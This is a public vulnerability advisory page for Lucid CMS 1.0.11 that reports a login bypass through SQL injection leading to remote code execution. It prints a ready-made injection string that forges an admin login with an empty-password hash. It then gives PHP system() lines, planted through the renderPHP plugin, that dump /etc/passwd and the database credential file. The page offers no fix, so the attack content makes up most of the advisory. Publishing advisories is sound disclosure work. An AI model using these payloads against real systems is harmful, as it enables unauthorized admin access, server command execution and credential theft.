Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution

2005.09.30
Credit: rgod
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution software: site: http://lucidcms.net/ description: lucidCMS is a simple and flexible content management system for the individual or organization that wishes to manage a collection of web pages without the overhead and complexity of other available "community" CMS options. 1) if magic quotes off -> SQL Injection: you can login as admin typing in login form: login: 'UNION(SELECT'1','admin','admin','FAKE (at) hotmail (dot) com [email concealed]','d41d8cd98f00b204e98 00998ecf8427e','1')/* pass: [nothing] ^ | | this is the hash of...nothing the result of md5(''); note:"login" without spaces the login query become: SELECT * FROM lucid_users WHERE name=''UNION(SELECT'1','admin','admin','FAKE (at) hotmail (dot) com [email concealed]','d41d8cd98f00b 204e9800998ecf8427e','1')/*' 2) now new admin can edit template and insert evil javascript code, see the phpinfo(), manage users/groups, activate/disable plugins, you can activate renderPHP plugin, add the following line at the end of the main stylesheet: <?php error_reporting(0); system('cat /etc/passwd > temp.txt'); ?> to see /etc/passwd file <?php error_reporting(0); system('cat dBConfig.php > temp.txt'); ?> to see database username/password, the database name and table prefix... now you have the full control of the database rgod site: http://altervista.org mail: retrogod (at) aliceposta (dot) it [email concealed] original advisory: http://rgod.altervista.org/lucidcms1011.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top